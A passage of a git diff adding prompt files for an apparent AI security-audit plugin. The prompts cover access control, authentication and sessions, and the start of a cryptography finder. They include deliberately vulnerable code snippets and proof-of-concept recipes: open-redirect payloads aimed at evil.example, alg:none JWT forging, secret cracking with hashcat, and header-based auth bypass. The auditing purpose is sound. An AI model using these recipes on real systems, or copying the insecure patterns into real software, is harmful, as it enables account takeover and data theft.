+  redirect_to params[:return_to]                # SINK (Rails ≥7.0 defaults raise; older silent)
+  ```
+
+## 4. Not-a-finding (false-positive guard)
+
+Before flagging, confirm NONE of these neutralize the path. If an effective
+control sits between source and sink, do **not** report.
+
+- **Object scoped to the actor**: lookup is constrained to the caller —
+  `current_user.invoices.find(id)`, `.filter(owner=request.user)`,
+  `WHERE id = ? AND user_id = ?`, `repo.findByIdAndOwner(id, principal)`. The id
+  is request-controlled but the row is fenced.
+- **Explicit authorization on the path**: Pundit `authorize @record`, CanCanCan
+  `authorize! :update, @x`, Spring `@PreAuthorize("hasRole('ADMIN')")` /
+  `@PostAuthorize("returnObject.owner == principal")`, Laravel
+  `$this->authorize('update', $model)` / `@can`, Django DRF
+  `permission_classes`/object-level `has_object_permission`, a middleware that
+  checks role **and** is provably mounted on this route. Verify it actually runs
+  for this handler and covers this verb/object, not a sibling route.
+- **Mass assignment guarded**: strong params (`params.permit(:a,:b)`),
+  serializer/DTO allow-list, Laravel `$fillable`/`$guarded`, an explicit field
+  map (`user.name = body.name`), Spring `@InitBinder setAllowedFields` or a
+  dedicated request record. A model with **no** privileged columns at all is not
+  exploitable for priv-esc.
+- **Open redirect tamed**: target validated against an allow-list of
+  hosts/paths, forced relative (`url.startsWith("/") && !startsWith("//")`),
+  same-origin check, or a server-side lookup table (id→url). Framework helpers
+  that only allow local paths (Django `url_has_allowed_host_and_scheme`, Spring
+  redirect to a mapped view name) are safe.
+- **Non-guessable + non-enumerable id is mitigation-lite, not a pass**: a random
+  UUID/opaque token raises the bar but is NOT authorization. Flag at reduced
+  severity if the id leaks elsewhere (logs, listings, referers) or is otherwise
+  obtainable; treat strong randomness as a partial control, never a clean pass.
+- **Read of genuinely public data** (published posts, public profile) with no
+  tenant/PII boundary — not a finding.
+- **Unreachable**: route not registered, handler dead, control flow returns
+  before the sink, or the "source" is server-derived (`session.user_id`), not
+  attacker-controlled.
+
+A control counts only if it is **on the path, runs before the sink, and matches
+the object/verb**. A global `authenticate` middleware does NOT satisfy the
+ownership requirement — note it as identity-only and keep hunting for the authZ
+check.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated or trivially-authenticated IDOR/missing-authZ
+  over **enumerable** ids giving read/write of other tenants' data, account
+  takeover, or admin action (delete/role-grant). Mass assignment that sets
+  `is_admin`/`role` to escalate. Reachable, no effective control.
+- **High** — authenticated horizontal IDOR (read or modify another user's
+  resource) over enumerable ids; vertical priv-esc requiring a realistic
+  precondition; mass assignment of a sensitive-but-not-admin field
+  (`org_id`, `balance`, `price`). Open redirect used in an auth/OAuth flow
+  (token/credential theft chain).
+- **Medium** — IDOR limited to low-sensitivity data, or gated by a
+  non-guessable id that is plausibly obtainable; standalone open redirect
+  (phishing only); priv-esc needing chained unlikely conditions.
+- **Low/Info** — redirect constrained to a small known set; theoretical gap with
+  a partial control present; info-only with no PII/tenant boundary.
+
+Escalate one level if the same root cause hits many endpoints, or if the
+resource is auth material / payment / PII.
+
+## 6. Emit findings as
+
+One object per root cause (list extra call sites in `data_flow`/`rationale`).
+JSON object with EXACTLY these fields:
+
+- `id` — stable slug, e.g. `ac-idor-invoice-show`.
+- `title` — one line, names flaw + endpoint.
+- `vuln_class` — `access-control`.
+- `owasp` — `A01:2025`.
+- `cwe` — most specific: `CWE-639` (IDOR/authZ-by-key), `CWE-862` (missing
+  authZ), `CWE-863` (incorrect authZ), `CWE-601` (open redirect), `CWE-915`
+  (mass assignment); list multiple if apt.
+- `asvs` — a V8 requirement id (e.g. `V8.1.x`); add `V3.x` for open redirect.
+- `severity` — `critical|high|medium|low|info` per §5.
+- `status` — `confirmed` (proven/reproduced) | `likely` (clear trace, no live
+  PoC) | `triage` (needs verification).
+- `confidence` — `low|medium|high`.
+- `file`, `line`, `end_line` — the sink location.
+- `code_excerpt` — the minimal vulnerable lines (sink + binding).
+- `source` — exact untrusted origin, e.g. `req.params.id` (HTTP path param),
+  `request.json["role"]` (request body).
+- `sink` — exact dangerous op, e.g. `Invoice.find(id)`, `user.update(body)`,
+  `res.redirect(url)`.
+- `data_flow` — `source -> ... -> sink`, naming each hop, and **explicitly
+  noting any sanitizer/authz seen and why it is insufficient** (wrong object,
+  wrong verb, not on path).
+- `sanitizers_checked` — the FP guard from §4 you verified: which controls you
+  looked for (ownership scope, `authorize`, strong params, redirect allow-list)
+  and that each is **absent or ineffective**. This field is mandatory; an empty
+  or hand-wavy value means the finding is not yet credible.
+- `rationale` — why reachable + exploitable; cite the missing check.
+- `exploit_sketch` — concrete attacker steps (e.g. "log in as user A, GET
+  `/invoices/124` where 124 is user B's id → read B's data").
+- `dynamic_poc_plan` — the live request(s) and the observed result that proves
+  it (see §7).
+- `proposed_fix` — high-level direction, not a patch: in 1-2 sentences, state
+  WHAT must change and WHY (e.g. "Scope the lookup to the authenticated owner so
+  one user cannot read another's invoice" / "Bind updates through an explicit
+  allow-list so privileged fields like `role` are not mass-assignable"). No code
+  diff, exact code, or line-level/step-by-step edits — leave the implementation
+  to the engineer/agent who picks up the issue.
+
+Fill `source`, `sink`, `data_flow`, and `sanitizers_checked` precisely — they
+are the evidence a reviewer re-checks. A finding without a clear source→sink and
+a verified-absent control is `triage` at best.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove a **cross-actor** or **privilege** boundary is crossed against a
+running instance. Generic recipe:
+
+1. **Provision two principals** of the same tier: user A and user B (and, for
+   vertical tests, a low-priv user vs. an admin-only action). Seed one record
+   per user.
+2. **IDOR (read/write)**: authenticate as A; send A's session/token to the
+   handler but with **B's object id** (path/query/body). Enumerate adjacent ids
+   (`n±1`, sequential, or a leaked uuid).
+   - *Proof*: response returns B's data, or a follow-up read as B shows A's
+     mutation took effect — with a `200`/changed state where a `403/404` is
+     correct. Diff against the same request using A's own id (which should
+     succeed) to show only ownership differs.
+3. **Missing function-level authZ / forced browsing**: as a low-priv (or
+   anonymous) principal, hit the privileged route directly (`POST
+   /admin/users/{id}/delete`). *Proof*: `200`/effect instead of `403`.
+4. **Mass assignment / priv-esc**: as a normal user, `PATCH /users/me` (or the
+   update endpoint) with an extra field — `{"role":"admin"}`,
+   `{"is_admin":true}`, `{"org_id":<victim org>}`. *Proof*: re-fetch the profile
+   and observe the privileged field changed; then exercise an admin-only action
+   to confirm the elevation is live.
+5. **Open redirect**: request the redirecting endpoint with
+   `?next=https://evil.example/` (and bypass variants: `//evil.example`,
+   `https:evil.example`, `/\evil.example`, `%2f%2fevil.example`, and the
+   trusted-host-as-prefix form `https://trusted.example.evil.example`).
+   *Proof*: a `30x` with `Location: https://evil.example/...` (off-origin host).
+
+Capture the exact request (method, path, headers/cookie, body), the actor
+identity used, and the response status/body/`Location` proving the boundary
+broke. Record this in `dynamic_poc_plan`; on success set `status: confirmed`.
+A control request (the same call with the actor's own id succeeding, so only
+ownership differs) makes the proof unambiguous.
diff --git a/plugins/security/prompts/finders/auth-session.md b/plugins/security/prompts/finders/auth-session.md
new file mode 100644
index 0000000..0b39638
--- /dev/null
+++ b/plugins/security/prompts/finders/auth-session.md
@@ -0,0 +1,391 @@
+<!--
+FINDER PROMPT — auth-session. You are a fresh-context auditor hunting ONE class:
+Authentication & Session Management. Read the target's code; emit finding
+objects. Signal discipline (AGENTS.md) is binding: only a REACHABLE flaw on the
+identity/credential/session/token path — where an attacker can forge, bypass,
+fixate, or recover identity — counts, and only after confirming the framework's
+own protections are absent/disabled/misused. No defense-in-depth musings, no
+dead code, no posture items (missing MFA "in general", password-policy text).
+-->
+
+# Finder — Authentication & Session (`auth-session`)
+
+**Class key:** `auth-session` · **OWASP:** A07:2025 (Authentication
+Failures) · **CWE:** CWE-287 (improper auth) / CWE-384 (session fixation) /
+CWE-620 (unverified password change) / CWE-640 (weak reset mechanism) / CWE-521
+(weak password reqs) · **ASVS:** V6 (Authentication) / V7 (Session) / V9 (Tokens
+& JWT) / V10 (OAuth/OIDC)
+
+## 1. Objective
+
+Find where an attacker can **become or impersonate a user without their
+credential**: forge/bypass a token or session (JWT `alg:none`/weak secret,
+guessable session id, fixation), hijack the login/reset/OAuth flow (no token
+check, predictable reset token, open `redirect_uri`, missing `state`), or where
+credentials are stored so weakly that a DB read = mass account takeover
+(plaintext, MD5/SHA1, unsalted, fast hash).
+
+## 2. Where to look
+
+Trace the **identity lifecycle**: login → session/token issuance → per-request
+verification → privileged action → logout/reset. The bug is a step that trusts
+attacker-controllable material as proof of identity.
+
+- **Login / credential check:** `login`, `sign_in`, `authenticate`,
+  `verify_password`, `check_password`, `password_verify`, controllers under
+  `auth/`, `sessions/`, `accounts/`, `Devise`, `passport`, `next-auth`,
+  `Spring Security`, `omniauth`. Look at the comparison and what happens on each
+  branch.
+- **Token mint & verify:** anything touching `jwt`, `jsonwebtoken`, `jose`,
+  `pyjwt`, `golang-jwt`, `jjwt`, `ruby-jwt`, `firebase/php-jwt`; `sign`/`encode`
+  and `verify`/`decode`/`decodeJwt`. The verify call and its options are the
+  hot spot (algorithm allow-list, secret/key source, audience/issuer/expiry).
+- **Session config & store:** `express-session`, `cookie-session`, Rails
+  `config/session_store`, `flask.session`/`Flask-Login`, Django `SESSION_*`,
+  `gorilla/sessions`, PHP `session_start`/`ini`, Lucky/Kemal session handlers.
+  Check cookie flags, session-id regeneration on login, store integrity.
+- **Password reset / email verify:** `forgot`, `reset_password`,
+  `reset-token`, `confirmation_token`, `magic-link`, OTP/2FA verify. Examine
+  token generation (RNG, length, lifetime, single-use, binding to the user) and
+  the verify branch.
+- **OAuth/OIDC:** `/callback`, `/oauth`, `redirect_uri`, `state`, `nonce`,
+  `id_token` handling, provider config; PKCE for public clients; `state`
+  CSRF binding; signature & `aud`/`iss` validation of `id_token`.
+- **Credential storage:** user model migrations/schema, `password`/
+  `password_hash`/`encrypted_password` columns, the hashing call at write time,
+  API-key/token columns, "remember me" tokens.
+
+Per-language SINK / sensitive-call signals:
+
+- **Crystal:** `JWT.decode(token, verify: false)` or no `algorithm:` pin;
+  `Crypto::Bcrypt::Password.create`/`.verify` (good) vs. `Digest::MD5`/`SHA1`
+  on a password; Kemal `env.session` without `session.set` regen on login;
+  `Random` (non-secure) for tokens vs. `Random::Secure`.
+- **Ruby:** `JWT.decode(tok, nil, false)` (verify off) / missing `algorithm:`;
+  `Digest::SHA1.hexdigest(pw)`, `Digest::MD5`; `==` on a token/HMAC instead of
+  `ActiveSupport::SecurityUtils.secure_compare`; Devise `pepper`/`stretches`
+  misset; `SecureRandom` (good) vs. `rand`/`Time.now` for reset tokens;
+  `session_store` without `secret_key_base`; no `reset_session` after sign-in.
+- **Node/TS:** `jwt.verify(tok, key, { algorithms:['none'] })` or no
+  `algorithms` option (defaults can accept attacker's `alg`); `jwt.decode()`
+  used as if it verifies; HS256 with a short/literal secret; `bcrypt`/`argon2`
+  (good) vs. `crypto.createHash('md5'|'sha1')` or `===` on passwords;
+  `express-session` `{ secret:'keyboard cat', cookie:{ secure:false,
+  httpOnly:false } }`, no `req.session.regenerate()` on login; `Math.random()`
+  for tokens; OAuth callback with no `state` compare.
+- **Python:** `jwt.decode(tok, options={'verify_signature': False})` or
+  `algorithms` omitted; `hashlib.md5/sha1(pw)`, `hashlib.sha256` unsalted vs.
+  `bcrypt`/`argon2`/`pbkdf2_hmac` with enough iterations; `==` token compare vs.
+  `hmac.compare_digest`; Flask `SECRET_KEY` empty/guessable, `SESSION_COOKIE_*`
+  off; `random.random()`/`uuid1` for reset tokens vs. `secrets.token_urlsafe`;
+  Django `check_password` good, raw compare bad.
+- **Go:** `jwt.Parse` whose `Keyfunc` doesn't assert `token.Method` (accepts
+  `none`/RS↔HS confusion); `ParseWithClaims` ignoring `Valid`; `md5.Sum`/
+  `sha1.Sum` on passwords vs. `bcrypt.CompareHashAndPassword`/`argon2`;
+  `subtle.ConstantTimeCompare` (good) vs. `==`/`bytes.Equal` on secrets;
+  `math/rand` for tokens vs. `crypto/rand`; session cookie without
+  `Secure`/`HttpOnly`/`SameSite`.
+- **PHP:** `JWT::decode($t, $key, ['none'])` (firebase/php-jwt) or no allowed-alg
+  array; `md5($pw)`/`sha1($pw)` vs. `password_hash($pw, PASSWORD_BCRYPT|ARGON2)`
+  + `password_verify`; `==`/`===` on hashes vs. `hash_equals`;
+  `session.cookie_secure=0`, no `session_regenerate_id(true)` after login;
+  `mt_rand`/`uniqid` for reset tokens vs. `random_bytes`/`bin2hex`.
+- **Java:** `Jwts.parser().parseClaimsJws` without `setSigningKey` /
+  `parse(token)` accepting unsigned (`alg:none`) JWS; `MessageDigest
+  .getInstance("MD5"|"SHA-1")` on passwords vs. `BCryptPasswordEncoder`/
+  `Argon2`; `String.equals` on tokens vs. `MessageDigest.isEqual`; Spring
+  Security `permitAll()` over a protected matcher, `csrf().disable()` paired
+  with cookie sessions; `new Random()`/`Math.random()` for tokens vs.
+  `SecureRandom`; `id_token` accepted without signature check.
+- **Rust:** `jsonwebtoken::decode` with `Validation` whose `algorithms` allows
+  attacker control or `insecure_disable_signature_validation`; `md5`/`sha1`
+  crate on passwords vs. `argon2`/`bcrypt`; `==` on `&[u8]` secret vs. `subtle`/
+  `constant_time_eq`; low-entropy or non-crypto-PRNG (`SmallRng`, `fastrand`)
+  tokens vs. `OsRng`/`thread_rng`; `actix-session`/`tower-sessions` cookie w/o secure flags.
+
+## 3. Detection heuristics
+
+The pattern is always: **attacker-controllable identity material (SOURCE)
+reaches a trust decision or is the credential of record (SINK) without a correct
+verification** — signature/algorithm pinned, secret strong & secret, token
+random+single-use+bound, session id regenerated, redirect/state validated, hash
+slow+salted.
+
+SOURCES (untrusted): the `Authorization`/`Cookie`/`X-*` headers, JWT/`id_token`
+strings and their `alg`/`kid` header, session cookie value, login form
+username/password, `redirect_uri`/`state`/`code` query params, reset/confirm
+token from URL, OTP from body, "remember me" cookie, any header claiming a
+role/user id.
+
+SINKS (trust decisions / credential ops): JWT/`id_token` verify-decode that
+yields `current_user`; password comparison branch; session creation /
+`current_user =` assignment; reset-token lookup → password set; OAuth callback →
+session issuance; the hashing call that persists a credential; the cookie/header
+that is later trusted as identity.
+
+- **JWT `alg:none` / unverified decode** — verification disabled or algorithm
+  not pinned, so an attacker forges claims:
+
+  ```js
+  // Node — no algorithms allow-list; "alg":"none" or HS/RS confusion accepted
+  const claims = jwt.verify(req.cookies.tok, PUBLIC_KEY);   // SINK
+  req.user = claims.sub;                                      // trusts forged sub
+  ```
+  ```python
+  jwt.decode(tok, key, options={"verify_signature": False})  # SINK: any token valid
+  ```
+  ```go
+  jwt.Parse(tok, func(t *jwt.Token) (interface{}, error) {
+      return secret, nil })   // SINK: no t.Method.(*jwt.SigningMethodHMAC) check → none/RS↔HS
+  ```
+
+- **Weak/leaked JWT secret or signing key** — HS256 with a guessable literal
+  secret (`"secret"`, `"changeme"`, an env default), or the public key used as
+  the HMAC secret (RS→HS confusion). Attacker brute-forces or re-signs.
+
+  ```ruby
+  JWT.encode(payload, "secret", "HS256")   # SINK: brute-forceable secret
+  ```
+
+- **Session fixation** — session id NOT regenerated at privilege change (login),
+  so an attacker who plants a known id rides the victim's authenticated session:
+
+  ```python
+  # Flask + server-side store (e.g. Flask-Session) — login keeps the pre-seeded session id
+  session["user_id"] = user.id            # SINK: no session.regenerate / new id
+  ```
+  ```php
+  $_SESSION['uid'] = $user->id;            // SINK: no session_regenerate_id(true)
+  ```
+
+- **Insecure session cookie / store** — cookie missing `HttpOnly`/`Secure`/
+  `SameSite`, predictable session id, signed-but-not-encrypted client-side
+  session holding trust flags, hardcoded session secret:
+
+  ```js
+  app.use(session({ secret:'keyboard cat',
+    cookie:{ secure:false, httpOnly:false } }));   // SINK: theftable, non-secure
+  ```
+
+- **Insecure password reset / magic link** — token from a weak RNG, too short,
+  no expiry, reusable, or not bound to the user; or reset proceeds without
+  proving possession:
+
+  ```ruby
+  token = rand(1_000_000).to_s            # SINK: 1e6 space, guessable/brute
+  user.update(reset_token: token)
+  ```
+  ```python
+  token = str(uuid.uuid1())               # SINK: time/MAC-based, predictable
+  ```
+  Also: reset endpoint that takes `user_id` + new password with **no token**
+  (CWE-620 unverified change), or accepts the token but never checks expiry/
+  single-use.
+
+- **Plaintext / weak-hash credential storage** — password stored as-is, or with
+  a fast/unsalted hash; a DB leak = instant mass ATO:
+
+  ```python
+  user.password = hashlib.md5(pw.encode()).hexdigest()   # SINK: fast, unsalted
+  ```
+  ```php
+  $hash = sha1($password);                                // SINK
+  ```
+  ```sql
+  INSERT INTO users(email, password) VALUES (?, ?)        -- SINK: raw plaintext pw
+  ```
+
+- **Non-constant-time secret compare** — token/HMAC/password-hash compared with
+  `==`/`equals`/`bytes.Equal`, leaking via timing (lower severity, but real for
+  remote-guessable tokens):
+
+  ```go
+  if token == stored { ... }              // SINK: use subtle.ConstantTimeCompare
+  ```
+
+- **OAuth/OIDC flaws** — callback issues a session without validating `state`
+  (login CSRF / code injection), `redirect_uri` not allow-listed (token/code
+  exfil), `id_token` accepted without signature/`aud`/`iss`/`nonce` check,
+  public client without PKCE:
+
+  ```js
+  // Express — no state compare, redirect_uri reflected from request
+  app.get('/callback', async (req,res)=>{
+    const tok = await exchange(req.query.code);   // SINK: no state check
+    req.session.user = tok.sub; });
+  ```
+
+- **Auth bypass logic** — a branch that grants identity on an attacker-set
+  condition: `if (req.headers['x-user']) req.user = ...`, default/empty password
+  accepted, `verify_password` returning truthy on empty input, debug/backdoor
+  account, or a compare that passes when both sides are `undefined`/`null`.
+
+## 4. Not-a-finding (false-positive guard)
+
+Before flagging, confirm NONE of these neutralize the path. If an effective
+control sits on the identity path, do **not** report.
+
+- **JWT verified correctly:** `verify`/`decode` with an explicit `algorithms`
+  allow-list that excludes `none` and matches the key type (HS* with a secret,
+  RS*/ES* with a public key), signature validation ON, and `exp`/`aud`/`iss`
+  checked. Go `Keyfunc` that asserts `token.Method.(*jwt.SigningMethodHMAC)` (or
+  the expected method). A strong, env-injected, high-entropy secret/key is not a
+  finding for "weak secret".
+- **`decode` used only for non-trust display** (logging, UI) where the result is
+  NOT used for an authorization/identity decision — re-verify reachability;
+  no trust sink → not a finding.
+- **Session id regenerated on privilege change:** Rails `reset_session` (CSRF
+  token rotation alone does not count), `req.session.regenerate()`,
+  `session_regenerate_id(true)`, Django's login cycling the key, framework that
+  rotates by default on auth. Fixation is then closed.
+- **Secure cookie config present:** `HttpOnly` + `Secure` + `SameSite`
+  (Lax/Strict), server-side opaque session store or an encrypted+signed cookie
+  with a strong secret. Missing `Secure` only matters if the app serves over
+  HTTPS / is internet-facing — note the precondition.
+- **Strong reset/verify token:** CSPRNG (`SecureRandom`, `secrets`,
+  `crypto.randomBytes`, `random_bytes`, `crypto/rand`) ≥128 bits, single-use,
+  short TTL, bound to the user, and the new password set ONLY after the token is
+  validated. A signed/HMAC'd token with server-side expiry is fine.
+- **Strong password hashing:** `bcrypt`/`scrypt`/`argon2`/`PBKDF2` with sane
+  cost, per-user salt (these include it), verified with the library's compare.
+  This is correct storage — not a finding even if the rest is imperfect.
+- **Constant-time compare** for tokens/HMACs: `secure_compare`,
+  `hmac.compare_digest`, `subtle.ConstantTimeCompare`, `MessageDigest.isEqual`,
+  `hash_equals`, `constant_time_eq`. Timing finding is closed.
+- **OAuth done right:** `state` generated + stored + compared (CSRF bound),
+  `redirect_uri` matched against a server allow-list, `id_token` signature +
+  `aud`/`iss`/`exp`/`nonce` validated, PKCE on public clients.
+- **Server-derived identity:** the value driving the decision is set by the
+  server from an already-authenticated session (not re-read from an
+  attacker-controllable header/claim) → not attacker-controlled.
+- **Unreachable:** route unregistered, the insecure option behind a dev/test
+  flag that is off in the audited config, handler dead, or the call returns
+  before the sink.
+
+A control counts only if it is **on the identity path and runs before the trust
+decision**. "There is a login screen" is not authorization; a global
+`authenticate` proving identity does not fix a forgeable token. Note any
+identity-only control and keep hunting for the verification that's actually
+missing.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable full auth bypass / account takeover:
+  JWT `alg:none` or signature-off accepted on a trust path, trivially
+  brute-forceable/leaked signing secret, reset token guessable or reset without
+  any token, plaintext or unsalted-MD5/SHA1 password storage (DB read → mass
+  ATO), OAuth callback issuing a session with no signature/`state` check. No
+  effective control on the path.
+- **High** — auth/session compromise under a realistic precondition: session
+  fixation (attacker must plant an id), session secret/key with limited entropy,
+  reset token with a real but bounded weakness (no expiry / reusable but
+  high-entropy), open `redirect_uri` enabling code/token theft, predictable
+  session ids, missing `state` where same-site mitigates partially.
+- **Medium** — exploitation needs unusual conditions or yields limited gain:
+  non-constant-time compare of a remotely-guessable token, missing `HttpOnly`/
+  `Secure` on a non-sensitive cookie or a plain-HTTP deployment, weak password
+  policy that meaningfully enables credential stuffing, fast-but-salted hash
+  (e.g. single-round SHA256 + salt).
+- **Low/Info** — timing leak on a non-guessable secret, hardening gaps with a
+  compensating control present, password-policy nits with no concrete bypass.
+
+Escalate one level if the same root cause covers all auth (one verify helper, one
+session config) or the credential is reused across systems.
+
+## 6. Emit findings as
+
+One object per root cause (list extra call sites in `data_flow`/`rationale`).
+JSON object with EXACTLY these fields:
+
+- `id` — stable slug, e.g. `as-jwt-alg-none-verify`, `as-reset-token-weak-rng`.
+- `title` — one line naming the flaw + location (e.g. "JWT verified without
+  algorithm pin in `auth/jwt.ts`").
+- `vuln_class` — `auth-session`.
+- `owasp` — `A07:2025`.
+- `cwe` — most specific: `CWE-287` (improper auth / JWT bypass / OAuth),
+  `CWE-384` (session fixation), `CWE-620` (unverified credential change),
+  `CWE-640` (weak reset mechanism), `CWE-521` (weak password reqs); add
+  `CWE-916`/`CWE-759`/`CWE-256` for weak/unsalted/plaintext storage,
+  `CWE-330`/`CWE-338` for weak token RNG, `CWE-547`/`CWE-798` for hardcoded
+  secrets, `CWE-208` for timing compare. List multiple if apt.
+- `asvs` — the closest requirement id: V6.x (auth/passwords/storage), V7.x
+  (sessions), V9.x (JWT/tokens), V10.x (OAuth/OIDC).
+- `severity` — `critical|high|medium|low|info` per §5.
+- `status` — `confirmed` (proven/reproduced) | `likely` (clear trace, no live
+  PoC) | `triage` (needs verification).
+- `confidence` — `low|medium|high`.
+- `file`, `line`, `end_line` — the sink (the verify/compare/store/session call).
+- `code_excerpt` — the minimal vulnerable lines (the decode/verify options, the
+  hash call, the session config, the token gen).
+- `source` — exact untrusted origin, e.g. `req.cookies.tok` (JWT from cookie),
+  `request.args["token"]` (reset token from URL), `req.query.code` (OAuth code).
+- `sink` — exact dangerous op, e.g. `jwt.verify(tok, key)` (no `algorithms`),
+  `hashlib.md5(pw)`, `session["uid"]=...` (no regen), `token == stored`.
+- `data_flow` — `source -> ... -> sink`, naming each hop, and **explicitly
+  noting any verification/sanitizer seen and why it is insufficient** (no alg
+  pin, signature off, secret guessable, no expiry, fast hash, non-const compare).
+- `sanitizers_checked` — the §4 FP guard you verified: which controls you looked
+  for (alg allow-list, signature on, strong secret, session regen, secure cookie
+  flags, CSPRNG + single-use + expiry token, slow salted hash, constant-time
+  compare, `state`/`redirect_uri`/`id_token` validation) and that each is
+  **absent, disabled, or ineffective**. Mandatory; empty/hand-wavy ⇒ not credible.
+- `rationale` — why reachable + exploitable; cite the exact missing check.
+- `exploit_sketch` — concrete attacker steps (e.g. "craft a JWT with
+  `{"alg":"none"}` and `sub:1`, strip the signature, send as cookie → server
+  trusts it as admin").
+- `dynamic_poc_plan` — the live request(s) and the observed result that proves it
+  (see §7).
+- `proposed_fix` — high-level direction, not a patch: 1-2 sentences naming WHAT
+  must change and WHY, leaving the exact code to the engineer/agent who picks up
+  the issue. E.g. "Pin the accepted JWT algorithm to the issuer's signing scheme
+  and reject unsigned/`none` tokens so forged claims can't be trusted." No code
+  diff, exact code, line-level edits, or step-by-step implementation.
+
+Fill `source`, `sink`, `data_flow`, and `sanitizers_checked` precisely — they are
+the evidence a reviewer re-checks. A finding without a clear source→sink and a
+verified-absent control is `triage` at best.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove identity can be **forged, bypassed, fixated, or recovered** against
+a running instance. Capture the exact request (method, path, headers/cookie,
+body), the response, and a negative control. On success set `status: confirmed`.
+
+1. **JWT `alg:none` / unverified:** take a valid token (or mint one with the
+   claimed structure), set the header to `{"alg":"none","typ":"JWT"}`, change
+   `sub`/`role` to a target (admin), drop the signature (keep trailing dot), send
+   it. *Proof*: an authenticated/privileged response (`200`, admin data) where a
+   tampered token must yield `401`. Also try HS-signing with the server's public
+   key (RS→HS confusion) and a wordlist brute of an HS secret (`jwt_tool`,
+   `hashcat -m 16500`).
+2. **Weak signing secret:** crack the JWT offline; re-sign a forged admin token
+   with the recovered secret and replay. *Proof*: server accepts the re-signed
+   token as that identity.
+3. **Session fixation:** obtain a session id pre-auth (or set a chosen one),
+   have the victim authenticate within that session, then reuse the SAME id.
+   *Proof*: the pre-login id is now authenticated (no rotation observed in
+   `Set-Cookie` after login).
+4. **Insecure cookie / theft:** inspect `Set-Cookie` for missing `HttpOnly`/
+   `Secure`/`SameSite`; *proof* is the flags' absence plus a reachable XSS or
+   non-TLS path that would exfiltrate it (note the chain dependency).
+5. **Weak/replayable reset token:** trigger a reset, capture the token; show it
+   is short/predictable (enumerate the space, or derive from time/uuid1), reuse
+   it twice, or use it after the stated TTL. *Proof*: a password change accepted
+   with a guessed/reused/expired token. For CWE-620: hit the reset endpoint with
+   only `user_id` + new password (no token) and confirm the change.
+6. **Plaintext/weak hash:** if a self-registration + DB-dump or admin export is
+   reachable, show the stored value equals `md5(pw)`/the plaintext. Otherwise
+   prove statically from the write path and treat as `likely`.
+7. **OAuth `state`/`redirect_uri`:** start a flow, drop or alter `state` on the
+   callback — *proof*: a session still issued (login CSRF). Supply an attacker
+   `redirect_uri` not on the server allow-list — *proof*: the code/token is sent
+   to the attacker origin. Submit an unsigned/wrong-`aud` `id_token` — *proof*:
+   session issued.
+8. **Auth-bypass logic:** send the attacker-controlled trust input
+   (`X-User: admin`, empty/null password, default account) — *proof*: a
+   privileged response instead of `401`.
+
+Negative control (a correctly-signed token, a fresh post-login session id, a
+valid single-use token, a well-formed `state`) returning the EXPECTED behavior
+makes the proof unambiguous. Record the request, actor, and response in
+`dynamic_poc_plan`.
diff --git a/plugins/security/prompts/finders/crypto.md b/plugins/security/prompts/finders/crypto.md
new file mode 100644
index 0000000..10fb6ef
--- /dev/null
+++ b/plugins/security/prompts/finders/crypto.md
@@ -0,0 +1,324 @@
+<!--
+FINDER PROMPT — crypto. You are a fresh-context auditor hunting ONE class:
+Cryptographic Failures (weak/broken algorithms, ECB, static IV/salt, weak RNG
+for security, disabled TLS verification, hardcoded keys, bad key management).
+Read the target's code; emit finding objects. Signal discipline (AGENTS.md) is
+binding: only a REACHABLE use of broken crypto that protects something an
+attacker can reach/influence, where no effective mitigation sits on the path, is
+a finding. No defense-in-depth musings, no dead code, no posture items, no
+"consider rotating keys" without a concrete sink.
+-->
+
+# Finder — Cryptographic Failures (`crypto`)
+
+**Class key:** `crypto` · **OWASP:** A04:2025 · **CWE:** CWE-327 (broken/weak
+algo) / CWE-328 (weak hash) / CWE-326 (inadequate strength) / CWE-330 (weak RNG)
+/ CWE-331 (insufficient entropy) / CWE-916 (unsalted/fast password hash) /
+CWE-295 (improper cert validation) · **ASVS:** V11
+
+## 1. Objective
+
+Find places where data that needs cryptographic protection is protected with a
+**broken primitive, a broken mode, a predictable parameter, or no real
+verification** — such that an attacker can decrypt, forge, predict, MITM, or
+crack it. The bug is the crypto choice/parameterization itself, reachable on
+data an attacker controls or wants. The fix is a correct primitive (AEAD, KDF,
+strong hash, CSPRNG, validated TLS).
+
+## 2. Where to look
+
+Crypto failures cluster at a handful of surfaces. Map the data first: *what is
+being protected, who can reach it, what breaks if it's forged/decrypted/cracked.*
+
+- **Auth & credential storage:** password hashing in user/account models,
+  `set_password`/`hash_password`, session-token & API-key generation,
+  password-reset / email-verify / invite token mint, "remember me" cookies,
+  TOTP/2FA secret handling. Weak hash or weak RNG here is the highest-value find.
+- **Token / signature layers:** JWT signing & verification (`alg`, key choice),
+  HMAC over webhooks/callbacks, signed URLs / signed cookies, CSRF tokens,
+  license/entitlement signing, document/PDF signing.
+- **At-rest encryption:** field-level encryption in ORMs/models (PII, card data,
+  secrets columns), "encrypt this blob" helpers, config/secret encryptors,
+  backup encryption, KMS/envelope-encryption wrappers, cookie/session
+  serializers that encrypt.
+- **TLS / transport clients:** every outbound HTTP/DB/SMTP/LDAP/gRPC/MQ client —
+  look for verification toggles in client construction, custom `TrustManager`/
+  `SSLContext`, `verify=False`, `rejectUnauthorized:false`, `InsecureSkipVerify`,
+  custom hostname verifiers, pinning that's been disabled.
+- **Crypto utility modules:** `crypto.rb`, `cipher.go`, `encryption.py`,
+  `Crypto.cr`, `util/hash`, `security/`, anything `*encrypt*`/`*cipher*`/`*sign*`/
+  `*token*`/`*nonce*`/`*salt*`/`*kdf*`.
+- **Key material:** where keys/IVs/salts/secrets are *sourced* — hardcoded
+  literals, committed PEM/`.key`/`.pem`/`keystore`/`.jks`, default-valued config,
+  keys derived from a low-entropy/static seed, IV/salt declared as a constant or
+  reused across messages.
+
+Per-language SINK / API signals:
+
+- **Crystal:** `Digest::MD5`/`Digest::SHA1` over secrets, `OpenSSL::Cipher.new`
+  with `"des"`/`"rc4"`/`"aes-128-ecb"`, `Random` (non-secure) vs
+  `Random::Secure` for tokens, `OpenSSL::SSL::Context` with
+  `verify_mode = OpenSSL::SSL::VERIFY_NONE`, hardcoded `Crypto::Subtle` keys,
+  `Random.rand`/`rand` for token bytes.
+- **Ruby:** `Digest::MD5/SHA1.hexdigest(password)`, `OpenSSL::Cipher.new('DES'
+  /'RC4'/'AES-128-ECB')`, `cipher.iv = "0"*16` / fixed IV, `rand`/`SecureRandom`
